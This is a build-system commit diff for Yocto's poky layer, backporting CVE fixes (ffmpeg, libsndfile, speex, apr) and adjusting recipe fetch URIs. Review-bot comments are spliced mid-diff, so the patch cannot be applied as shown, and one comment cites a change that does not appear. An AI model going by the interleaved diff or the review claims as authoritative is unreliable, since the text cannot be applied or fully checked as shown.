@@ -0,0 +1,53 @@ +From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001 +From: James Almer <jamrial@gmail.com> +Date: Wed, 21 Jul 2021 01:02:44 -0300 +Subject: [PATCH] avcodec/utils: don't return negative values in + av_get_audio_frame_duration() + +In some extrme cases, like with adpcm_ms samples with an extremely high channel +count, get_audio_frame_duration() may return a negative frame duration value. +Don't propagate it, and instead return 0, signaling that a duration could not +be determined. + +CVE: CVE-2021-3566 +Fixes ticket #9312 +Signed-off-by: James Almer <jamrial@gmail.com> +Signed-off-by: Saloni Jain <salonij@kpit.com> + +Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1] +Comment: No changes/refreshing done. +--- + libavcodec/utils.c | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +diff --git a/libavcodec/utils.c b/libavcodec/utils.c +index 5fad782f5a..cfc07cbcb8 100644 +--- a/libavcodec/utils.c ++++ b/libavcodec/utils.c +@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba, + + int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes) + { +- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate, ++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate, + avctx->channels, avctx->block_align, + avctx->codec_tag, avctx->bits_per_coded_sample, + avctx->bit_rate, avctx->extradata, avctx->frame_size, + frame_bytes); ++ return FFMAX(0, duration); + } + + int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes) + { +- return get_audio_frame_duration(par->codec_id, par->sample_rate, ++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate, + par->channels, par->block_align, + par->codec_tag, par->bits_per_coded_sample, + par->bit_rate, par->extradata, par->frame_size, + frame_bytes); ++ return FFMAX(0, duration); + } + + #if 
!HAVE_THREADS +-- +2.20.1 diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb index 0e359848fa..1d6f2e528b 100644 --- a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb @@ -27,7 +27,9 @@ SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \ file://mips64_cpu_detection.patch \ file://CVE-2020-12284.patch \ file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \ - " + file://CVE-2021-3566.patch \ + file://CVE-2021-38291.patch \ + " SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3" SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c" diff --git a/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb index af79a6f952..6494013e3f 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20 DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native" -SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \ file://0001-Make-player-examples-installable.patch \ file://gst-player.desktop \ " diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch new file mode 100644 index 0000000000..e32f3c101f --- /dev/null +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch 
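Review bot: The tag in this patch header reads `CVE: CVE-2021-3566`, but the file is CVE-2021-38291.patch and its change, clamping a negative result in `av_get_audio_frame_duration()`, is unrelated to the tty probe fix that carries CVE-2021-3566 in this same commit. Any tooling or audit that reads the tag rather than the file name would record the wrong CVE as patched and could leave CVE-2021-38291 looking open. The line should read `CVE: CVE-2021-38291`.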
@@ -0,0 +1,33 @@ +From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001 +From: Seungha Yang <seungha@centricular.com> +Date: Tue, 15 Sep 2020 00:54:58 +0900 +Subject: [PATCH] tests: seek: Don't use too strict timeout for validation + +Expected segment-done message might not be seen within expected +time if system is not powerful enough. + +Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625> + +Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c] +Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> +Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com> +--- + tests/check/pipelines/seek.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c +index 28bb8846d..5f7447bc5 100644 +--- a/tests/check/pipelines/seek.c ++++ b/tests/check/pipelines/seek.c +@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2) + + GST_INFO ("wait for segment done message"); + +- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND, ++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE, + GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR); + fail_unless (msg, "no message within the timed window"); + fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done"); +-- +2.29.2 + diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb index a516fabdaf..236d6034d6 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb 
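Review bot: With `GST_CLOCK_TIME_NONE`, `gst_bus_timed_pop_filtered()` blocks until a matching message arrives, so the following `fail_unless (msg, "no message within the timed window")` can no longer fire on a timeout. If segment-done never arrives, the test now hangs until whatever outer test timeout applies, instead of failing with that message. A generous finite wait, for example `(GstClockTime) 30 * GST_SECOND`, would keep slow machines passing and still fail cleanly; the figure is a suggestion, not a measured value. The body of `test_loopback_2` continues outside the hunk.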
@@ -22,6 +22,7 @@ SRC_URI = " \ file://0003-meson-Add-valgrind-feature.patch \ file://0004-meson-Add-option-for-installed-tests.patch \ file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \ + file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \ " SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a" SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7" diff --git a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch new file mode 100644 index 0000000000..b42d564b4b --- /dev/null +++ b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch @@ -0,0 +1,13 @@ +Index: libsamplerate-0.1.8/configure.ac +=================================================================== +--- libsamplerate-0.1.8.orig/configure.ac ++++ libsamplerate-0.1.8/configure.ac +@@ -53,7 +53,7 @@ AC_PROG_LN_S + # 6. If any interfaces have been removed since the last public release, then set age + # to 0. + +-SHARED_VERSION_INFO="1:8:1" ++SHARED_VERSION_INFO="1:9:1" + + + diff --git a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb index 6dfc42b436..8345d6880f 100644 --- a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb +++ b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb @@ -10,6 +10,7 @@ PR = "r1" SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \ file://0001-configure.ac-improve-alsa-handling.patch \ + file://shared_version_info.patch \ " SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259" diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch new file mode 100644 index 0000000000..6354f856cb --- /dev/null 
+++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch @@ -0,0 +1,36 @@ +From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001 +From: bobsayshilol <bobsayshilol@live.co.uk> +Date: Wed, 17 Feb 2021 23:21:48 +0000 +Subject: [PATCH 1/2] wavlike: Fix incorrect size check + +The SF_CART_INFO_16K struct has an additional 4 byte field to hold +the size of 'tag_text' which the file header doesn't, so don't +include it as part of the check when looking for the max length. + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026 + +Upstream-Status: Backport +CVE: CVE-2021-3246 patch 1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/wavlike.c | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +Index: libsndfile-1.0.28/src/wavlike.c +=================================================================== +--- libsndfile-1.0.28.orig/src/wavlike.c ++++ libsndfile-1.0.28/src/wavlike.c +@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf + return 0 ; + } ; + +- if (chunksize >= sizeof (SF_CART_INFO_16K)) ++ /* ++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part ++ ** of the chunk, so don't include it in the size check. ++ */ ++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4) + { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ; + psf_binheader_readf (psf, "j", chunksize) ; + return 0 ; diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch new file mode 100644 index 0000000000..d6b03d7d4d --- /dev/null +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch 
@@ -0,0 +1,44 @@ +From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001 +From: bobsayshilol <bobsayshilol@live.co.uk> +Date: Thu, 18 Feb 2021 21:52:09 +0000 +Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks + +'blockalign' is the size of a block, and each block contains 7 samples +per channel as part of the preamble, so check against 'samplesperblock' +rather than 'blockalign'. Also add an additional check that the block +is big enough to hold the samples it claims to hold. + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803 + +Upstream-Status: Backport +CVE: CVE-2021-3246 patch 2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/ms_adpcm.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c +index 5e8f1a31..a21cb994 100644 +--- a/src/ms_adpcm.c ++++ b/src/ms_adpcm.c +@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock) + if (psf->file.mode == SFM_WRITE) + samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ; + +- if (blockalign < 7 * psf->sf.channels) +- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ; ++ /* There's 7 samples per channel in the preamble of each block */ ++ if (samplesperblock < 7 * psf->sf.channels) ++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ; ++ return SFE_INTERNAL ; ++ } ; ++ ++ if (2 * blockalign < samplesperblock * psf->sf.channels) ++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ; + return SFE_INTERNAL ; + } ; + +-- +2.25.1 + diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb index 044881a859..2525af8fe0 100644 
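Review bot: Both sides of the added `2 * blockalign < samplesperblock * psf->sf.channels` test are computed in `int`, since the signature declares both parameters as `int`. If callers do not already bound these header-derived values, a large enough value could wrap the product and let an undersized block pass. Whether they are bounded is decided outside the hunk; if not, widening before multiplying removes the doubt: `if (2 * (sf_count_t) blockalign < (sf_count_t) samplesperblock * psf->sf.channels)`. `wavlike_msadpcm_init` continues past the end of the hunk.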
--- a/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb @@ -20,6 +20,8 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \ file://CVE-2017-12562.patch \ file://CVE-2018-19758.patch \ file://CVE-2019-3832.patch \ + file://CVE-2021-3246_1.patch \ + file://CVE-2021-3246_2.patch \ " SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c" diff --git a/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch new file mode 100644 index 0000000000..eb16e95ffc --- /dev/null +++ b/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch @@ -0,0 +1,30 @@ +Backport patch to fix CVE-2020-23903. + +CVE: CVE-2020-23903 +Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84] + +Signed-off-by: Kai Kang <kai.kang@windriver.com> + +From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001 +From: Tristan Matthews <tmatth@videolan.org> +Date: Mon, 13 Jul 2020 23:25:03 -0400 +Subject: [PATCH] wav_io: guard against invalid channel numbers + +Fixes #13 +--- + src/wav_io.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/wav_io.c b/src/wav_io.c +index b5183015..09d62eb0 100644 +--- a/src/wav_io.c ++++ b/src/wav_io.c +@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32 + stmp = le_short(stmp); + *channels = stmp; + +- if (stmp>2) ++ if (stmp>2 || stmp<1) + { + fprintf (stderr, "Only mono and (intensity) stereo supported\n"); + return -1; diff --git a/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb b/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb index 3a0911d6f8..ea475f0f1b 100644 --- a/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb +++ b/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb 
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \ file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50" DEPENDS = "libogg speexdsp" -SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz" +SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \ + file://CVE-2020-23903.patch \ + " UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar" SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c" diff --git a/poky/meta/recipes-multimedia/x264/x264_git.bb b/poky/meta/recipes-multimedia/x264/x264_git.bb index 39429a8809..6789646833 100644 --- a/poky/meta/recipes-multimedia/x264/x264_git.bb +++ b/poky/meta/recipes-multimedia/x264/x264_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" DEPENDS = "nasm-native" -SRC_URI = "git://github.com/mirror/x264;branch=stable \ +SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \ file://don-t-default-to-cortex-a9-with-neon.patch \ file://Fix-X32-build-by-disabling-asm.patch \ " diff --git a/poky/meta/recipes-rt/rt-tests/rt-tests.inc b/poky/meta/recipes-rt/rt-tests/rt-tests.inc index 3ac39d90c3..29ebe2d361 100644 --- a/poky/meta/recipes-rt/rt-tests/rt-tests.inc +++ b/poky/meta/recipes-rt/rt-tests/rt-tests.inc @@ -2,7 +2,7 @@ SRCREV = "dff174f994f547a5785d32454865f140daacb0f5" PE = "1" -SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git" +SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main" # 1.2 to 1.5 seem to be development versions UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))" diff --git a/poky/meta/recipes-sato/images/core-image-sato.bb b/poky/meta/recipes-sato/images/core-image-sato.bb index e50b24a476..300d8e0d43 100644 --- a/poky/meta/recipes-sato/images/core-image-sato.bb +++ b/poky/meta/recipes-sato/images/core-image-sato.bb 
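Review bot: The rt-tests.inc change adds `branch=main` but keeps the fetch on plain `git://`, which has no transport encryption or server authentication, while the x264 hunk on this line gains `protocol=https`. `SRCREV` pins the commit, which limits what a tampered fetch could deliver, but HTTPS is cheap defence in depth: `SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main;protocol=https"`, assuming the host serves the repository over HTTPS. The same applies to the matchbox-config-gtk, matchbox-desktop, matchbox-panel-2, matchbox-terminal, matchbox-theme-sato, puzzles, sato-screenshot and settings-daemon hunks that follow.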
@@ -13,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0" TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0" QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}' +QB_MEM_qemuarmv5 = "-m 256" QB_MEM_qemumips = "-m 256" diff --git a/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb b/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb index 85c2c500ea..4d5d299d47 100644 --- a/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb +++ b/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb @@ -16,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ DEPENDS = "gtk+3 intltool-native gettext-native" PV = "0.8.18.1.11+git${SRCPV}" -SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git" +SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https" SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb index 547e851c15..5733a36b12 100644 --- a/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb @@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon" # SRCREV tagged 0.2 SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://no-handed.patch" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" diff --git a/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb index cc51f47b63..2a2eb24f57 100644 --- a/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb +++ b/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb 
@@ -13,7 +13,7 @@ SECTION = "x11/wm" # SRCREV tagged 2.2 SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777" -SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \ +SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \ file://vfolders/* \ " diff --git a/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb index c659964a2b..54fe578cd3 100644 --- a/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb +++ b/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb @@ -23,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel" RREPLACES_${PN} = "matchbox-panel" RCONFLICTS_${PN} = "matchbox-panel" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://0001-applets-systray-Allow-icons-to-be-smaller.patch \ " diff --git a/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb index 9f00281dde..e2e81c2905 100644 --- a/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb @@ -11,7 +11,7 @@ SECTION = "x11/utils" #SRCREV tagged 0.2 SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb index 7a043d3447..bc4024736f 100644 --- a/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb 
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc # SRCREV tagged 0.2 SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78" -SRC_URI = "git://git.yoctoproject.org/matchbox-sato" +SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/puzzles/puzzles_git.bb b/poky/meta/recipes-sato/puzzles/puzzles_git.bb index befe4a53f4..2edc9ada2e 100644 --- a/poky/meta/recipes-sato/puzzles/puzzles_git.bb +++ b/poky/meta/recipes-sato/puzzles/puzzles_git.bb @@ -9,7 +9,7 @@ DEPENDS = "libxt" # The libxt requires x11 in DISTRO_FEATURES REQUIRED_DISTRO_FEATURES = "x11" -SRC_URI = "git://git.tartarus.org/simon/puzzles.git \ +SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=master \ file://fix-compiling-failure-with-option-g-O.patch \ file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \ file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \ diff --git a/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb index 2b1f513f1c..7e7612253d 100644 --- a/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb +++ b/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb @@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3" # SRCREV tagged 0.3 SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756" -SRC_URI = "git://git.yoctoproject.org/screenshot" +SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb index d01177f9b9..19c4a73dc3 100644 --- a/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb +++ b/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb 
@@ -9,7 +9,7 @@ SECTION = "x11" # SRCREV tagged 0.0.2 SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2" -SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \ +SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \ file://addsoundkeys.patch \ file://70settings-daemon.sh \ " diff --git a/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch new file mode 100644 index 0000000000..528dec8c8b --- /dev/null +++ b/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch 
@@ -0,0 +1,31 @@ +From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Sun, 2 May 2021 13:10:49 -0700 +Subject: [PATCH] MiniBrowser: Fix reproduciblity + +Do not emit references to source dir in generated sourcecode + +Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283] +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt +index 93b62521..482d3b00 100644 +--- a/Tools/MiniBrowser/gtk/CMakeLists.txt ++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt +@@ -48,8 +48,8 @@ add_custom_command( + OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c + ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h + MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list +- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c +- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h ++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c ++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h + VERBATIM) + + if (DEVELOPER_MODE) +-- +2.31.1 + diff --git a/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb b/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb index ceda2992d7..2e3f0aa682 100644 --- a/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb +++ b/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb 
@@ -20,6 +20,7 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \ file://0001-Fix-build-with-musl.patch \ file://include_array.patch \ file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \ + file://0001-MiniBrowser-Fix-reproduciblity.patch \ " SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464" diff --git a/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch b/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch new file mode 100644 index 0000000000..00befdacee --- /dev/null +++ b/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch 
@@ -0,0 +1,58 @@ + +SECURITY: CVE-2021-35940 (cve.mitre.org) + +Restore fix for CVE-2017-12613 which was missing in 1.7.x branch, though +was addressed in 1.6.x in 1.6.3 and later via r1807976. + +The fix was merged back to 1.7.x in r1891198. + +Since this was a regression in 1.7.0, a new CVE name has been assigned +to track this, CVE-2021-35940. + +Thanks to Iveta Cesalova <icesalov redhat.com> for reporting this issue. + +https://svn.apache.org/viewvc?view=revision&revision=1891198 + +Upstream-Status: Backport +CVE: CVE-2021-35940 +Signed-off-by: Armin Kuster <akuster@mvista.com> + + +Index: time/unix/time.c +=================================================================== +--- a/time/unix/time.c (revision 1891197) ++++ b/time/unix/time.c (revision 1891198) +@@ -142,6 +142,9 @@ + static const int dayoffset[12] = + {306, 337, 0, 31, 61, 92, 122, 153, 184, 214, 245, 275}; + ++ if (xt->tm_mon < 0 || xt->tm_mon >= 12) ++ return APR_EBADDATE; ++ + /* shift new year to 1st March in order to make leap year calc easy */ + + if (xt->tm_mon < 2) +Index: time/win32/time.c +=================================================================== +--- a/time/win32/time.c (revision 1891197) ++++ b/time/win32/time.c (revision 1891198) +@@ -54,6 +54,9 @@ + static const int 